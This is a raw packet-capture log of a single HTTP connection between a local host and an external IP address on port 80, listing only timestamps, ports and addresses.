Oct 3, 2024 18:38:23.314686060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.314749002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.314781904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.314837933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.314949036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.314981937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.314987898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.314989090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315015078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315051079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315073013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315082073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315093994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315094948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315136909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315288067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315318108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315341949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315351009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315361023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315397978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315402985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315442085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315448046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315474987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315489054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315507889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315514088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315540075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315552950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315574884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315586090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315607071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315638065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315642118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315675020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.315680981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.315718889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316039085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316071033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316087008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316102982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316117048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316134930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316148043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316168070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316174984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316200972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316214085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316235065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316243887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316268921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316274881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316302061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316314936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316334963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316348076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316370010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316380978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316400051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316422939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316433907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316448927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316466093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316479921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316497087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.316509962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.316627026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.317099094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317131042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317147970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.317162991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317181110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.317195892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317228079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317239046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.317260027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317269087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.317291975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317296982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.317325115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317358017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317367077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.317390919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317399979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.317425013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317433119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.317456961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317471981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.317495108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317528009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317539930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.317559958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.317574978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.317605019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318051100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318084002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318115950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318145037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318147898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318172932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318180084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318182945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318213940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318244934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318255901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318279028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318283081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318311930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318346024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318351984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318375111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318378925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318396091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318411112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318418026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318443060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318454981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318478107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318526030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318561077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318582058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.318953991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318978071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318993092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.318998098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319048882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319051981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319067955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319083929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319084883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319098949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319098949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319116116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319123030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319123030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319132090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319148064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319158077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319164038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319180965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319190025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319195986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319211960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319215059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319224119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319246054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319257975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319834948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319850922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319864988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319880009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319888115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319889069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319902897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319907904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319925070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319936991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319941044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319951057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319956064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319972038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319978952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.319988012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.319999933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320004940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320020914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320020914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320036888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320059061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320583105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320599079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320612907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320627928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320636034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320657015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320657015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320669889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320730925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320745945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320760012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320775032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320775986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320790052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320796967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320806026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320815086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320821047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320837021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320839882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320852041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320863008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320868015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320883989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.320890903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320904016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.320924044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.321618080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.321634054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.321647882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.321662903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.321671963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.321676970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.321687937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.321693897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.321711063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.321713924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.321727037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.321733952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.321742058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.321758986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.321780920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.322467089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.322482109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.322495937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.322510004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.322515965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.322523117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.322535992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.322540998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.322550058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.322566986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.322582960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.322592974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.323262930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323287010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323301077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323306084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.323319912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323327065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.323334932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323343039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.323350906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323363066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.323365927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323379040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.323381901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323404074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323405981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.323420048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323434114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323441982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.323448896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323465109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323466063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.323481083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323493004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.323493958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.323518991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.323535919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324109077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324125051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324139118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324153900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324156046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324166059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324167967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324182987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324187994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324198008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324199915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324209929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324215889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324229002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324229002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324239969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324244976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324259996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324264050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324273109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324287891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324290991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324302912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324320078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324323893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324337959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324340105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324357033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324364901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324372053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324384928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324388981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324405909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324429035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.324963093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324979067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.324991941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325006962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325010061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325022936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325033903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325038910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325052023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325056076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325067043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325074911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325095892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325105906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325284004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325300932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325314999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325329065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325335026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325344086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325345039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325362921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325365067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325376987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325395107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325403929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325428009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325444937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325459003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325469971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325474024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325488091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325489998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325505972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325511932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325511932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325520992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325531960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325537920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325552940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325553894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325566053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325568914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325584888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.325586081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325596094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325614929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.325623989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.326345921 CEST	80	49730	185.215.113.37	192.168.2.4
